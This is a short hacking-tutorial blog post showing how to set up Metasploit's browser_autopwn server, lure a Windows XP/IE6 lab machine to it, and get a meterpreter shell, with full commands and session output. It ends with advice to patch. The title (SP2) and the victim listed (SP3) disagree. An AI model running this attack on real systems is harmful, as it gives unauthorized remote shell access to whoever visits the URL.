metalkey

Hacking tutorials + info

Metasploit Browser Autopwn – Windows XP SP2

July 01, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows XP SP3 (Java 6u25, IE6)

Step 1 – Starting the Browser Autopwn Server

Run msfconsole, load the browser_autopwn module and set all required options.

root@kali:~$ msfconsole
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.12
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
msf auxiliary(browser_autopwn) > run

[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.

The Browser Autopwn Server is now running and waiting for victims to browse to the url http://192.168.1.12

Step 2 – Pwning the Victim

On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a meterpreter session.

[*] Meterpreter session 1 opened (192.168.1.12:7777 ->
192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...meterpreter > shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>echo %USERNAME%
Victim

C:\Documents and Settings\IEUser\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\IEUser\Desktop>

You now have shell access to the Windows XP SP3 Victim with the same access as the user who navigated to the exploit url.

Solution

Keep your software fully updated (e.g. Windows, Web Browsers, Java, etc…) and uninstall unused applications.

Tags: metasploit